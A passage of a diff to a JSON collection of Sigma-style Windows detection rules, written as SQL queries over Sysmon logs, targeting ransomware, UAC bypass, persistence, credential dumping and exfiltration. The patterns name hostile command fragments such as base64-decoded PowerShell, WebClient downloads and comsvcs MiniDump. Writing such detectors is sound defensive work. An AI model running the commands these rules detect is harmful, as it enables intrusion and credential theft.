"frack113", - "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.015" - ], + "description": "Detects command line patterns used by BlackByte ransomware in different operations", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ((CommandLine LIKE '%-sta %' ESCAPE '\\' OR CommandLine LIKE '%-localserver %' ESCAPE '\\') AND CommandLine LIKE '%{%' ESCAPE '\\' AND CommandLine LIKE 
'%}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND CommandLine LIKE '% -single %' ESCAPE '\\') OR (CommandLine LIKE '%del C:\\\\Windows\\\\System32\\\\Taskmgr.exe%' ESCAPE '\\' OR CommandLine LIKE '%;Set-Service -StartupType Disabled $%' ESCAPE '\\' OR CommandLine LIKE '%powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(%' ESCAPE '\\' OR CommandLine LIKE '% do start wordpad.exe /p %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_registered_com_objects.yml" + "filename": "proc_creation_win_malware_blackbyte_ransomware.yml" }, { - "title": "DevInit Lolbin Download", - "id": "90d50722-0483-4065-8e35-57efaadd354d", + "title": "Potential SystemNightmare Exploitation Attempt", + "id": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", "status": "test", - "description": "Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system", + "description": "Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% -t msi-install %' ESCAPE '\\' AND CommandLine LIKE '% -i http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%printnightmare.gentilkiwi.com%' ESCAPE '\\' OR CommandLine LIKE '% /user:gentilguest %' ESCAPE '\\' OR CommandLine LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_devinit.yml" 
+ "filename": "proc_creation_win_exploit_other_systemnightmare.yml" }, { - "title": "Process Dump via RdrLeakDiag.exe", - "id": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", + "title": "UAC Bypass Using MSConfig Token Modification - Process", + "id": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", "status": "test", - "description": "Detects a process memory dump performed by RdrLeakDiag.exe", - "author": "Cedric MAURUGEON", + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND OriginalFileName = 'RdrLeakDiag.exe' AND CommandLine LIKE '%fullmemdmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\msconfig.exe\" -5' ESCAPE '\\')" ], - "filename": "proc_creation_win_rdrleakdiag_process_dumping.yml" + "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml" }, { - "title": "Change Default File Association To Executable Via Assoc", - "id": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", - "status": "experimental", - "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. 
Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Persistence Via Netsh Helper DLL", + "id": "56321594-9087-49d9-bf10-524fe8479452", + "status": "test", + "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.", + "author": "Victor Sergeev, oscd.community", "tags": [ + "attack.privilege_escalation", "attack.persistence", - "attack.t1546.001" + "attack.t1546.007", + "attack.s0108" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%assoc %' ESCAPE '\\' AND CommandLine LIKE '%exefile%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.exe=exefile%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\netsh.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%helper%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" + "filename": "proc_creation_win_netsh_helper_dll_persistence.yml" }, { - "title": "Suspicious Windows Defender Registry Key Tampering Via Reg.EXE", - "id": "452bce90-6fb0-43cc-97a5-affc283139b3", - "status": "experimental", - "description": "Detects the usage of \"reg.exe\" to tamper with different Windows defender registry keys in order to disable some important features related to protection and detection", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious RASdial Activity", + "id": 
"6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", + "status": "test", + "description": "Detects suspicious process related to rasdial.exe", + "author": "juju4", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Rare legitimate use by administrators to test software (should always be investigated)" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\')) AND ((CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND (CommandLine LIKE '%Real-Time Protection%' ESCAPE '\\' OR CommandLine LIKE '%TamperProtection%' ESCAPE '\\')) OR (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Notification\\_Suppress%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%rasdial.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_defender_tampering.yml" + "filename": "proc_creation_win_rasdial_execution.yml" }, { - "title": "Suspicious XOR Encoded PowerShell Command", - "id": "bb780e0c-16cf-4383-8383-1e5471db6cf9", + "title": "WMI Persistence - Script Event Consumer", + "id": "ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e", "status": "test", - "description": "Detects presence of a potentially xor encoded powershell command", - "author": "Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali", + "description": "Detects WMI script event consumers", + "author": 
"Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1059.001", - "attack.t1140", - "attack.t1027" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + "Legitimate event consumers", + "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6') AND CommandLine LIKE '%bxor%' ESCAPE '\\' AND (CommandLine LIKE '%ForEach%' ESCAPE '\\' OR CommandLine LIKE '%for(%' ESCAPE '\\' OR CommandLine LIKE '%for %' ESCAPE '\\' OR CommandLine LIKE '%-join %' ESCAPE '\\' OR CommandLine LIKE '%-join''%' ESCAPE '\\' OR CommandLine LIKE '%-join\"%' ESCAPE '\\' OR CommandLine LIKE '%-join`%' ESCAPE '\\' OR CommandLine LIKE '%::Join%' ESCAPE '\\' OR CommandLine LIKE '%[char]%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\' AND ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_xor_commandline.yml" + "filename": "proc_creation_win_wmi_persistence_script_event_consumer.yml" }, { - "title": "Execute MSDT Via Answer File", - "id": "9c8c7000-3065-44a8-a555-79bcba5d9955", - "status": "experimental", - "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + 
"title": "UAC Bypass Tools Using ComputerDefaults", + "id": "3c05e90d-7eba-4324-9972-5d7f711a60a8", + "status": "test", + "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml%' ESCAPE '\\' AND (CommandLine LIKE '% -af %' ESCAPE '\\' OR CommandLine LIKE '% /af %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\pcwrun.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (IntegrityLevel IN ('High', 'System') AND Image LIKE 'C:\\\\Windows\\\\System32\\\\ComputerDefaults.exe' ESCAPE '\\') AND NOT ((ParentImage LIKE '%:\\\\Windows\\\\System32%' ESCAPE '\\' OR ParentImage LIKE '%:\\\\Program Files%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_msdt_answer_file.yml" + "filename": "proc_creation_win_uac_bypass_computerdefaults.yml" }, { - "title": "New Kernel Driver Via SC.EXE", - "id": "431a1fdb-4799-4f3b-91c3-a683b003fc49", - "status": "experimental", - "description": "Detects creation of a new service (kernel driver) with the type \"kernel\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Execution of InstallUtil Without Log", + "id": "d042284c-a296-4988-9be5-f424fadcc28c", + "status": "test", + "description": "Uses the .NET InstallUtil.exe application in order to execute image without log", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - 
"attack.t1543.003" + "attack.defense_evasion" ], "falsepositives": [ - "Rare legitimate installation of kernel drivers via sc.exe" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND (CommandLine LIKE '%create%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\') AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND CommandLine LIKE '%type%' ESCAPE '\\' AND CommandLine LIKE '%kernel%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' AND Image LIKE '%Microsoft.NET\\\\Framework%' ESCAPE '\\' AND CommandLine LIKE '%/logfile= %' ESCAPE '\\' AND CommandLine LIKE '%/LogToConsole=false%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sc_new_kernel_driver.yml" + "filename": "proc_creation_win_instalutil_no_log_execution.yml" }, { - "title": "Suspicious Hacktool Execution - PE Metadata", - "id": "37c1333a-a0db-48be-b64b-7393b2386e3b", + "title": "HackTool - SharpLDAPmonitor Execution", + "id": "9f8fc146-1d1a-4dbf-b8fd-dfae15e08541", "status": "experimental", - "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of the SharpLDAPmonitor. 
Which can monitor the creation, deletion and changes to LDAP objects.", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.discovery" + ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Company = 'Cube0x0')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\SharpLDAPmonitor.exe' ESCAPE '\\' OR OriginalFileName = 'SharpLDAPmonitor.exe') OR (CommandLine LIKE '%/user:%' ESCAPE '\\' AND CommandLine LIKE '%/pass:%' ESCAPE '\\' AND CommandLine LIKE '%/dcip:%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_execution_via_pe_metadata.yml" + "filename": "proc_creation_win_hktl_sharp_ldap_monitor.yml" }, { - "title": "Process Reconnaissance Via Wmic.EXE", - "id": "221b251a-357a-49a9-920a-271802777cc0", + "title": "Greedy File Deletion Using Del", + "id": "204b17ae-4007-471b-917b-b917b315c5db", "status": "experimental", - "description": "Detects the execution of \"wmic\" with the \"process\" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.", + "description": "Detects execution of the \"del\" builtin command to remove files using greedy/wildcard expression. 
This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%process%' ESCAPE '\\') AND NOT (CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%del %' ESCAPE '\\' OR CommandLine LIKE '%erase %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\\\*.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\\\*.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_recon_process.yml" + "filename": "proc_creation_win_cmd_del_greedy_deletion.yml" }, { - "title": "UAC Bypass Using MSConfig Token Modification - Process", - "id": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", + "title": "PowerShell Download Pattern", + "id": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", "status": "test", - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects a Powershell process that contains download commands in its command line string", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\msconfig.exe\" -5' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%net.webclient).%' ESCAPE '\\' AND CommandLine LIKE '%download%' ESCAPE '\\' AND (CommandLine LIKE '%string(%' ESCAPE '\\' OR CommandLine LIKE '%file(%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml" + "filename": "proc_creation_win_powershell_download_patterns.yml" }, { - "title": "Shadow Copies Creation Using Operating Systems Utilities", - "id": "b17ea6f7-6e90-447e-a799-e6c0a493d6ce", - "status": "test", - "description": "Shadow Copies creation using operating systems utilities, possible credential access", - "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Hermetic Wiper TG Process Patterns", + "id": "2f974656-6d83-4059-bbdf-68ac5403422f", + "status": "experimental", + "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.002", - "attack.t1003.003" + "attack.execution", + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Legitimate administrator working with shadow copies, access for backup purposes" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE 
'\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\policydefinitions\\\\postgresql.exe' ESCAPE '\\' OR (CommandLine LIKE '%CSIDL\\_SYSTEM\\_DRIVE\\\\temp\\\\sys.tmp%' ESCAPE '\\' OR CommandLine LIKE '% 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\\\_\\_16%' ESCAPE '\\') OR (CommandLine LIKE '%powershell -c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\comsvcs.dll MiniDump %' ESCAPE '\\' AND CommandLine LIKE '%\\\\winupd.log full%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_shadow_copies_creation.yml" + "filename": "proc_creation_win_malware_hermetic_wiper_activity.yml" }, { - "title": "Suspicious Binary In User Directory Spawned From Office Application", - "id": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", + "title": "LOLBAS Data Exfiltration by DataSvcUtil.exe", + "id": "e290b10b-1023-4452-a4a9-eb31a9013b3a", "status": "experimental", - "description": "Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)", - "author": "Jason Lynch", + "description": "Detects when a user performs data exfiltration by using DataSvcUtil.exe", + "author": "Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.g0046", - "car.2013-05-002" + "attack.exfiltration", + "attack.t1567" ], "falsepositives": [ - "Unknown" + "DataSvcUtil.exe being used may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "DataSvcUtil.exe being executed from unfamiliar users 
should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\EQNEDT32.exe' ESCAPE '\\') AND Image LIKE 'C:\\\\users\\\\%' ESCAPE '\\' AND Image LIKE '%.exe' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Teams.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%/in:%' ESCAPE '\\' OR CommandLine LIKE '%/out:%' ESCAPE '\\' OR CommandLine LIKE '%/uri:%' ESCAPE '\\') AND (Image LIKE '%\\\\DataSvcUtil.exe' ESCAPE '\\' OR OriginalFileName = 'DataSvcUtil.exe'))" ], - "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml" + "filename": "proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" }, { - "title": "Execution via CL_Invocation.ps1", - "id": "a0459f02-ac51-4c09-b511-b8c9203fc429", - "status": "test", - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "Suspicious DumpMinitool Execution", + "id": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "status": "experimental", + "description": "Detects suspicious ways to use the \"DumpMinitool.exe\" binary", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND 
CommandLine LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND CommandLine LIKE '%SyncInvoke%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR Image LIKE '%\\\\DumpMinitool.x86.exe' ESCAPE '\\' OR Image LIKE '%\\\\DumpMinitool.arm64.exe' ESCAPE '\\') OR OriginalFileName IN ('DumpMinitool.exe', 'DumpMinitool.x86.exe', 'DumpMinitool.arm64.exe')) AND ((NOT ((Image LIKE '%\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Extensions\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.txt%' ESCAPE '\\') OR ((CommandLine LIKE '% Full%' ESCAPE '\\' OR CommandLine LIKE '% Mini%' ESCAPE '\\' OR CommandLine LIKE '% WithHeap%' ESCAPE '\\') AND NOT (CommandLine LIKE '%--dumpType%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_cl_invocation.yml" + "filename": "proc_creation_win_dumpminitool_susp_execution.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Update Activity", - "id": "e7581747-1e44-4d4b-85a6-0db0b4a00f2a", - "status": "experimental", - "description": "Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE", + "id": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", + "status": "test", + "description": "Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall", + "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.t1562.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\3CXDesktopApp\\\\app\\\\update.exe' ESCAPE '\\' AND CommandLine LIKE '%--update%' 
ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%/electron/update/win32/18.12%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%allowedprogram%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%action=allow%' ESCAPE '\\' AND CommandLine LIKE '%program=%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%Public\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\' OR 
CommandLine LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_3cx_compromise_susp_update.yml" + "filename": "proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" }, { - "title": "Bypass UAC via WSReset.exe", - "id": "d797268e-28a9-49a7-b9a8-2f5039011c5c", + "title": "Suspicious Debugger Registration Cmdline", + "id": "ae215552-081e-44c7-805f-be16f975c8a2", "status": "test", - "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", + "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ + "attack.persistence", "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.t1546.008" ], "falsepositives": [ - "Unknown sub processes of Wsreset.exe" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR OriginalFileName = 'CONHOST.EXE'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 